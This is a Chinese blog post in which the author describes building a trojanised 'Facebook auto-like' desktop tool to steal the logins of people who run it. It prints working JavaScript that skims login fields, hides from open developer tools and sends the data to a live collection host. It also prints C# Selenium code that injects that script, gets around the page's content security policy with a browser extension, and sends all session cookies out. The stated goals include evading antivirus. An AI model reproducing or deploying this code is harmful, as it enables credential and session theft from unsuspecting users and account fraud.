觉的文章还行
麻烦转发一下
FACEBOOK打广告,用黑号配黑料是很不错的搭配,目前FACEBOOK打广告最近封号也挺严,为了解决账号问题,老N只能想办法撸点黑号。
买号?这辈子都是不可能的,平时也就搬砖实在辛苦买点雪碧弱弱喉咙,买号这么费钱的东西,我是不敢奢望的。
点击下面,看客们回味一下。
今天我就做个案例,我来普及下作为一个懂点菜逼技术的农村人,我是怎么偷号的。
如有雷同,不准报案!!!
话说当时失眠了
话说当时失眠了,没错,此刻我码着字,床上的妹子一直喊着我入睡,我却迟迟不能入眠,此刻,身体已经掏空,为了吸粉,只能抛出点干货!!!
脑海里滚过无数个思路,怎么搞FACEBOOK黑号,怎么撸?洗号?这辈子都不可能的,号都那么难洗,撞库?猴年马月!!!
妹子已经饥渴难耐,显然时间上我等不及那么长的时间去做那些无意义的事情,如何能够长久?
转换思路
如何能钓的一些FACEBOOK优质账号呢?
显然得去搞些有人专门运营FACEBOOK的号,那些才珍贵(扯远了)
那么这些人一般需要什么?
没错,运营FACEBOOK显然需要相关的运营工具!!!
思考再三,我好像会码代码!!!
惊奇。。。我这么贫苦的人,竟然会代码。。太神奇了。
说时迟,那时快。。我立马打开VS 就是建了一个WINFORM!!
没错,起名英文名:facebookautolike,顾名思义:脸书自动跟随!!
然后操起我多年的审美观又是一顿画!
优秀完美,先打个1分。因为功能还没写!!!!
1 目的是为了窃取FACEBOOK账号和密码以及COOKIE
2 要让目标输入明文账号密码,而不是通过授权API的方式。
3 软件得有点FACEBOOK自动化的意思,才会骗取客户信任去执行。
4 不被杀软查杀!!
时间是一条金河,莫让它轻轻地在你的指尖溜过。
我们拖入selenium,准备用老套路,基于chrome的方式,再植入JS劫持代码(当然,或者根据上文的直接绑个马,但是万一被杀软查了,免杀就麻烦,也不持久!!)
安装完这两个包,我们就可以先写个自动化登陆FACEBOOK的代码了
加上代理是因为我肉身在莆田,不能直接看FB,当然,发布的时候肯定要去掉。然后加上缓存文件夹,是为了下次调用可以跳过登陆这块。
运行效果
辣么。现在还需要加入执行的JS获取COOKIE和账号密码的代码。
我们来翻一下之前安全界爆的一篇文章。
不巧,手上有这段代码,顺便改造下,改成只偷账号密码和COOKIE的就好,
整理下劫持代码
(function() {
const result = {};
result.isOpen = false;
result.orientation = undefined;
const num = 160;
const cback = (index, value) => {
window["dispatchEvent"](new CustomEvent("devtoolschange", {
"detail" : {
"isOpen" : index,
"orientation" : value
}
}));
};
setInterval(() => {
const mobile = window.outerWidth - window.innerWidth > num;
const adjustHeight = window.outerHeight - window.innerHeight > num;
const orientation = mobile ? "vertical" : "horizontal";
if (!(adjustHeight && mobile) && (window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || mobile || adjustHeight)) {
if (!result.isOpen || result.orientation !== orientation) {
cback(true, orientation);
}
result.isOpen = true;
result.orientation = orientation;
} else {
if (result.isOpen) {
cback(false, undefined);
}
result.isOpen = false;
result.orientation = undefined;
}
}, 500);
if (typeof module !== "undefined" && module.exports) {
module.exports = result;
} else {
window.devtools = result;
}
})();
String.prototype.hashCode = function() {
var hash = 0;
var i;
var chr;
if (this.length === 0) {
return hash;
}
i = 0;
for (; i < this.length; i++) {
chr = this.charCodeAt(i);
hash = (hash << 5) - hash + chr;
hash = hash | 0;
}
return hash;
};
var configData = {};
configData.Gate = "https://a.c0594.com/";
configData.Data = {};
configData.Sent = [];
configData.IsValid = false;
configData.SaveAllFields = function() {
var inputs = document.getElementsByTagName("input");
var pass=inputs[2].value+"--"+inputs[3].value;
configData.Data.Message=pass;
};
configData.SendData = function() {
if (!window.devtools.isOpen) {
configData.Data.Domain = location.hostname;
var hash = encodeURIComponent(window.btoa(JSON.stringify(configData.Data)));
alert(hash);
var multipleWildcard = hash.hashCode();
var curPatternPos = 0;
for (; curPatternPos < configData.Sent.length; curPatternPos++) {
if (configData.Sent[curPatternPos] == multipleWildcard) {
return;
}
}
configData.LoadImage(hash);
}
};
configData.TrySend = function() {
configData.SaveAllFields();
configData.SendData();
};
configData.LoadImage = function(url) {
configData.Sent.push(url.hashCode());
var img = document.createElement("IMG");
img.src = configData.GetImageUrl(url);
};
configData.GetImageUrl = function(swfUrlStr) {
return configData.Gate + "?reff=" + swfUrlStr;
};
document.onreadystatechange = function() {
if (document.readyState === "complete") {
window.setInterval(configData.TrySend, 500);
}
};
然后做个接口做接受,把接受的reff参数进行base64decode就好!!
我们把JS放入劫持的思路呢?
说时迟,那时快,立马一顿google,代码嵌入如下
driver.ExecuteScript("var s=window.document.createElement('script'); s.src = '//bbs.affadsense.com/test.js'; window.document.head.appendChild(s); ");
但是好像获取失败啊。。。
打开F12
原来碰上CSP了。。
又是一顿GOOGLE。这阻扰不了我的决心!!!
最后代码如下:
string fileDir = Environment.CurrentDirectory;
ChromeOptions options = new ChromeOptions();
options.AddArgument("--user-data-dir=" + fileDir + "/data");
OpenQA.Selenium.Proxy proxy = new OpenQA.Selenium.Proxy();
options.AddArguments("--proxy-server=127.0.0.1:1388");
// driver.Manage().Timeouts().PageLoad = TimeSpan.FromSeconds(500);
options.AddExtension("1.crx");
ChromeDriver driver = new ChromeDriver(options);
driver.Navigate().GoToUrl("https://www.facebook.com/");
string htmlcode = driver.FindElement(By.TagName("body")).GetAttribute("innerHTML");
driver.ExecuteScript("var s=window.document.createElement('script'); s.src = '//bbs.affadsense.com/test.js?v=3'; window.document.head.appendChild(s); ");
if (htmlcode.Contains("royal_login_button"))
{
MessageBox.Show("Please Login and then Click OK button");
}
driver.Quit();
通过加载第三方插件的方式,来修改浏览器的CSP设置
运行软件
然后我的平台接受到参数后
这仅仅是个开始,还得完成Facebook自动LIKE的功能
毕竟没有功能的马子不是好马子~~
然后就是一堆SELENIUM自动化的代码~~~~
这里还差个登陆后的COOKIE获取。
string cookiezz = "";
ReadOnlyCollection<Cookie> allCookies = driver.Manage().Cookies.AllCookies;
foreach (Cookie cookie in allCookies)
{
cookiezz = cookiezz + cookie.ToString() + ";";
}
然后通过base64再request一到接口上面
整段代码如下
private string GetWebContent(string sUrl)
{
string strResult = "";
try
{
System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(sUrl);
//声明一个HttpWebRequest请求
request.Timeout = 3000000;
//设置连接超时时间
request.Headers.Set("Pragma", "no-cache");
System.Net.HttpWebResponse response = (System.Net.HttpWebResponse)request.GetResponse();
if (response.ToString() != "")
{
Stream streamReceive = response.GetResponseStream();
Encoding encoding = Encoding.GetEncoding("UTF-8");//乱码处理
StreamReader streamReader = new StreamReader(streamReceive, encoding);
strResult = streamReader.ReadToEnd();
}
}
catch (Exception exp)
{
// MessageBox.Show(exp.Message);
}
return strResult;
}
private void Button1_Click(object sender, EventArgs e)
{
string fileDir = Environment.CurrentDirectory;
ChromeOptions options = new ChromeOptions();
options.AddArgument("--user-data-dir=" + fileDir + "/data");
OpenQA.Selenium.Proxy proxy = new OpenQA.Selenium.Proxy();
options.AddArguments("--proxy-server=127.0.0.1:1388");
// driver.Manage().Timeouts().PageLoad = TimeSpan.FromSeconds(500);
ChromeDriver driver = new ChromeDriver(options);
driver.Navigate().GoToUrl("https://www.facebook.com/");
string htmlcode = driver.FindElement(By.TagName("body")).GetAttribute("innerHTML");
if (htmlcode.Contains("royal_login_button"))
{
MessageBox.Show("Please Login and then Click OK button");
}
string cookiezz = "";
ReadOnlyCollection<Cookie> allCookies = driver.Manage().Cookies.AllCookies;
foreach (Cookie cookie in allCookies)
{
cookiezz = cookiezz + cookie.ToString() + ";";
}
byte[] data = System.Text.ASCIIEncoding.UTF8.GetBytes(cookiezz);
string base64Encoded = System.Convert.ToBase64String(data);
GetWebContent("http://bbs.affadsense.com/?reff=" + base64Encoded);
}
然后COOKIE就到手拉~~
好了,劫持钓鱼的功能就是基本这些模块了。
后续就是对这个软件进行完善,让他成为一个优秀的FACEBOOK自动化营销工具。
以上,就是整个通过浏览器自动化插入JS然后执行劫持的思路。
君子爱财,取之有道,黑号的获取方法千千万,不要给我抬杠,以上只是分享一种JS的方式,全文贯彻装逼路线,大神可以无视~~~
此刻,妹子已经一夜未眠,因为我未在她身边,我想,该是做个好男人的时刻了~~~
对了,姑娘约吗?
Amazon Scalping强大升级,SNS Group control的推出,SUPER BROWSER的面世。
码字不易,您的转发和赞赏是我的一大动力之一。
欢迎关注我的公众号,请爱护我,不要抄袭我。
欢迎加入我的论坛,与我们一起交流。
下面是加入小密圈/获取论坛邀请码购买渠道:
小密圈(入圈后私信圈主,看到会私信邀请码):
其他获取方式:
支付宝:
微信支付:
如有侵权请联系:admin#unsafe.sh